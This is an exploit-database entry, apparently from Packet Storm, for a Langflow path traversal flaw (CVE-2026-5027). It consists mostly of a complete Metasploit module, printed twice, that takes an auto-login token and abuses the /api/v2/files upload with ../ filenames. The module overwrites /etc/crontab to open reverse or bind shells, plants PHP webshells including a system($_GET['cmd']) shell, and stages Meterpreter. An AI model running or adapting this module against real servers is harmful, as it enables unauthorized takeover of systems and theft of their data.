📄 Langflow 1.8.4 Traversal / Remote Code Execution_PACKETSTORM:219697

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

This Metasploit module targets a path traversal vulnerability in Langflow versions 1.8.4 and below that allows attackers to write arbitrary files on the system through the /api/v2/files endpoint...

Visit Original Source

Basic Information

ID PACKETSTORM:219697

Published Apr 23, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Langflow ≤ 1.8.4 Path Traversal Leading to Unauthenticated Remote Code Execution Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.langflow.org/ |
==================================================================================================================================

[+] Summary : This Metasploit module targets a path traversal vulnerability in Langflow (≤ 1.8.4) that allows attackers to write arbitrary files on the system through the /api/v2/files endpoint.

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Langflow Path Traversal to Unauthenticated RCE',
'Description' => %q{
Langflow <= 1.8.4 contains an arbitrary file write vulnerability via path traversal
in the POST /api/v2/files endpoint.
},
'Author' => [
'indoushka'
],
'References' => [
['CVE', '2026-5027'],
['CWE', '22']
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Cron Job (Reverse Shell)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :cron_reverse,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Cron Job (Bind Shell)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :cron_bind,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/bind_bash'
}
}
],
[
'Webshell (PHP)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :webshell_php,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
}
}
],
[
'Linux Dropper (Meterpreter)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2026-04-19'
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path for Langflow installation', '/']),
OptString.new('USERNAME', [false, 'Username', '']),
OptString.new('PASSWORD', [false, 'Password', '']),
OptEnum.new('WRITE_METHOD', [
true,
'Method',
'cron',
['cron', 'ssh_keys', 'webshell', 'systemd']
]),
OptString.new('SSH_PATH', [false, 'SSH path', '/root/.ssh/authorized_keys']),
OptString.new('WEBSHELL_PATH', [false, 'Web path', '/app/static/shell.php']),
OptString.new('PUBLIC_KEY', [false, 'SSH key', ''])
])

register_advanced_options([
OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 9]),
OptInt.new('CRON_WAIT', [true, 'Wait time', 60])
])
end

def setup
@base_uri = normalize_uri(target_uri.path)
@traversal = '../' * datastore['TRAVERSAL_DEPTH']
@token = nil
end

def check
print_status("Checking Langflow...")

res = send_request_cgi({
'uri' => normalize_uri(@base_uri, 'api', 'v1', 'auto_login'),
'method' => 'GET'
})

if res && res.code == 200
begin
json = JSON.parse(res.body)
if json['access_token']
print_good("Auto-login enabled")
return Exploit::CheckCode::Vulnerable
end
rescue
end
end

Exploit::CheckCode::Unknown
end

def authenticate
res = send_request_cgi({
'uri' => normalize_uri(@base_uri, 'api', 'v1', 'auto_login'),
'method' => 'GET'
})

if res && res.code == 200
begin
json = JSON.parse(res.body)
@token = json['access_token'] if json['access_token']
return true if @token
rescue
end
end

fail_with(Failure::NoAccess, 'No token')
end

def write_file(remote_path, content)
filename = @traversal + remote_path.sub(/^\//, '')

data = Rex::MIME::Message.new
data.add_part(content, 'application/octet-stream', nil,
"form-data; name=\"file\"; filename=\"#{filename}\"")

res = send_request_cgi({
'uri' => normalize_uri(@base_uri, 'api', 'v2', 'files'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'headers' => { 'Authorization' => "Bearer #{@token}" }
})

return (res && (res.code == 200 || res.code == 201))
end

def exploit_cron_reverse(payload_content)
cron_content = <<~CRON
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * root #{payload_content}
CRON

write_file('/etc/crontab', cron_content)
end

def exploit_webshell_php(payload_content)
webshell_path = datastore['WEBSHELL_PATH']
php = "<?php #{payload_content} ?>"

if write_file(webshell_path, php)
register_file_for_cleanup(webshell_path)
print_good("Webshell written")
end
end

def exploit_linux_dropper
webshell = '/tmp/langflow.php'
content = '<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>'

if write_file(webshell, content)
@stager = normalize_uri(@base_uri, webshell)
execute_cmdstager({ 'background' => true })
end
end

def exploit
print_status("Exploiting Langflow")

authenticate

case target['Type']
when :cron_reverse
exploit_cron_reverse(payload.encoded)
when :webshell_php
exploit_webshell_php(payload.encoded)
when :linux_dropper
exploit_linux_dropper
end

print_status("Done")
handler if target['Type'] != :webshell_php
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-23T17:41:43",
    "description": "This Metasploit module targets a path traversal vulnerability in Langflow versions 1.8.4 and below that allows attackers to write arbitrary files on the system through the /api/v2/files endpoint...",
    "published": "2026-04-23T00:00:00",
    "modified": "2026-04-23T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Langflow 1.8.4 Traversal / Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219697",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-5027"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Langflow \u2264 1.8.4 Path Traversal Leading to Unauthenticated Remote Code Execution Metasploit Module               |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.langflow.org/                                                                                        |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Metasploit module targets a path traversal vulnerability in Langflow (\u2264 1.8.4) that allows attackers to write arbitrary files on the system through the /api/v2/files endpoint.\n    \n    \n    [+] POC        :  \n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::FileDropper\n      include Msf::Exploit::CmdStager\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Langflow Path Traversal to Unauthenticated RCE',\n            'Description' => %q{\n              Langflow <= 1.8.4 contains an arbitrary file write vulnerability via path traversal\n              in the POST /api/v2/files endpoint.\n            },\n            'Author' => [\n              'indoushka'\n            ],\n            'References' => [\n              ['CVE', '2026-5027'],\n              ['CWE', '22']\n            ],\n            'License' => MSF_LICENSE,\n            'Platform' => ['unix', 'linux'],\n            'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n            'Targets' => [\n              [\n                'Cron Job (Reverse Shell)',\n                {\n                  'Platform' => 'unix',\n                  'Arch' => ARCH_CMD,\n                  'Type' => :cron_reverse,\n                  'DefaultOptions' => {\n                    'PAYLOAD' => 'cmd/unix/reverse_bash'\n                  }\n                }\n              ],\n              [\n                'Cron Job (Bind Shell)',\n                {\n                  'Platform' => 'unix',\n                  'Arch' => ARCH_CMD,\n                  'Type' => :cron_bind,\n                  'DefaultOptions' => {\n                    'PAYLOAD' => 'cmd/unix/bind_bash'\n                  }\n                }\n              ],\n              [\n                'Webshell (PHP)',\n                {\n                  'Platform' => 'php',\n                  'Arch' => ARCH_PHP,\n                  'Type' => :webshell_php,\n                  'DefaultOptions' => {\n                    'PAYLOAD' => 'php/meterpreter/reverse_tcp'\n                  }\n                }\n              ],\n              [\n                'Linux Dropper (Meterpreter)',\n                {\n                  'Platform' => 'linux',\n                  'Arch' => [ARCH_X86, ARCH_X64],\n                  'Type' => :linux_dropper,\n                  'DefaultOptions' => {\n                    'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n                  }\n                }\n              ]\n            ],\n            'DefaultTarget' => 0,\n            'DisclosureDate' => '2026-04-19'\n          )\n        )\n    \n        register_options([\n          OptString.new('TARGETURI', [true, 'Base path for Langflow installation', '/']),\n          OptString.new('USERNAME', [false, 'Username', '']),\n          OptString.new('PASSWORD', [false, 'Password', '']),\n          OptEnum.new('WRITE_METHOD', [\n            true,\n            'Method',\n            'cron',\n            ['cron', 'ssh_keys', 'webshell', 'systemd']\n          ]),\n          OptString.new('SSH_PATH', [false, 'SSH path', '/root/.ssh/authorized_keys']),\n          OptString.new('WEBSHELL_PATH', [false, 'Web path', '/app/static/shell.php']),\n          OptString.new('PUBLIC_KEY', [false, 'SSH key', ''])\n        ])\n    \n        register_advanced_options([\n          OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 9]),\n          OptInt.new('CRON_WAIT', [true, 'Wait time', 60])\n        ])\n      end\n    \n      def setup\n        @base_uri = normalize_uri(target_uri.path)\n        @traversal = '../' * datastore['TRAVERSAL_DEPTH']\n        @token = nil\n      end\n    \n      def check\n        print_status(\"Checking Langflow...\")\n    \n        res = send_request_cgi({\n          'uri' => normalize_uri(@base_uri, 'api', 'v1', 'auto_login'),\n          'method' => 'GET'\n        })\n    \n        if res && res.code == 200\n          begin\n            json = JSON.parse(res.body)\n            if json['access_token']\n              print_good(\"Auto-login enabled\")\n              return Exploit::CheckCode::Vulnerable\n            end\n          rescue\n          end\n        end\n    \n        Exploit::CheckCode::Unknown\n      end\n    \n      def authenticate\n        res = send_request_cgi({\n          'uri' => normalize_uri(@base_uri, 'api', 'v1', 'auto_login'),\n          'method' => 'GET'\n        })\n    \n        if res && res.code == 200\n          begin\n            json = JSON.parse(res.body)\n            @token = json['access_token'] if json['access_token']\n            return true if @token\n          rescue\n          end\n        end\n    \n        fail_with(Failure::NoAccess, 'No token')\n      end\n    \n      def write_file(remote_path, content)\n        filename = @traversal + remote_path.sub(/^\\//, '')\n    \n        data = Rex::MIME::Message.new\n        data.add_part(content, 'application/octet-stream', nil,\n                      \"form-data; name=\\\"file\\\"; filename=\\\"#{filename}\\\"\")\n    \n        res = send_request_cgi({\n          'uri' => normalize_uri(@base_uri, 'api', 'v2', 'files'),\n          'method' => 'POST',\n          'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n          'data' => data.to_s,\n          'headers' => { 'Authorization' => \"Bearer #{@token}\" }\n        })\n    \n        return (res && (res.code == 200 || res.code == 201))\n      end\n    \n      def exploit_cron_reverse(payload_content)\n        cron_content = <<~CRON\n    SHELL=/bin/bash\n    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n    * * * * * root #{payload_content}\n    CRON\n    \n        write_file('/etc/crontab', cron_content)\n      end\n    \n      def exploit_webshell_php(payload_content)\n        webshell_path = datastore['WEBSHELL_PATH']\n        php = \"<?php #{payload_content} ?>\"\n    \n        if write_file(webshell_path, php)\n          register_file_for_cleanup(webshell_path)\n          print_good(\"Webshell written\")\n        end\n      end\n    \n      def exploit_linux_dropper\n        webshell = '/tmp/langflow.php'\n        content = '<?php if(isset($_GET[\"cmd\"])){system($_GET[\"cmd\"]);} ?>'\n    \n        if write_file(webshell, content)\n          @stager = normalize_uri(@base_uri, webshell)\n          execute_cmdstager({ 'background' => true })\n        end\n      end\n    \n      def exploit\n        print_status(\"Exploiting Langflow\")\n    \n        authenticate\n    \n        case target['Type']\n        when :cron_reverse\n          exploit_cron_reverse(payload.encoded)\n        when :webshell_php\n          exploit_webshell_php(payload.encoded)\n        when :linux_dropper\n          exploit_linux_dropper\n        end\n    \n        print_status(\"Done\")\n        handler if target['Type'] != :webshell_php\n      end\n    end\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219697",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219697/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply